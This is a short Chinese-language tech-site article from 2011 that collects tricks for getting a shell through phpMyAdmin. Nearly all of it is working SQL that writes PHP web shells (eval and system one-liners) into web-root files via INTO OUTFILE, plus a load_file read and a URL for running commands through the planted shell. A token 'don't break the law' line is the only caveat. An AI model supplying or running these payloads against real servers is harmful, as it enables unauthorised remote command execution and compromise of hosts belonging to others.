知识屋:更实用的电脑技术知识网站
所在位置:首页 > 网络安全 > 安全资讯

phpmyadmin拿shell技巧

发布时间:2011-02-27 18:47:14作者:知识屋

早先是看过JHACKJ后台拿shell的方法:


Create TABLE st4dy (cmd text NOT NULL);
Insert INTO st4dy (cmd) VALUES('<?php eval($_POST[cmd])?>');
select cmd from study into outfile 'E:/wamp/www/7.php';

Drop TABLE IF EXISTS study;


Create TABLE `wangzi` (`wangzi` TEXT NOT NULL) TYPE = MYISAM; Insert INTO `wangzi` ( `wangzi` ) VALUES ('<?php @system($_GET[cmd]);?>');
Select `wangzi` FROM `wangzi` INTO OUTFILE 'C:/xampp/htdocs/xampp/cmd.php'; Drop TABLE `wangzi`;
--------------------------------------------------------------------------

而后在国外论坛上看到一老外的方法更简单:

1:select load_file('E:/xamp/www/st4dy.php');

2:select '<?php echo '<pre>';system($_GET['cmd']); echo '</pre>'; ?>' INTO OUTFILE 'E:/xamp/www/st4dy.php'
然后访问网站目录:http://localhost/st4dy.php?cmd=dir

3:写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/st4dy.php'

第三个是直接在SQL查询里导出一句话,必须要先知道网站的路径
 

 

别做违法的事情奥~

(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏
  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜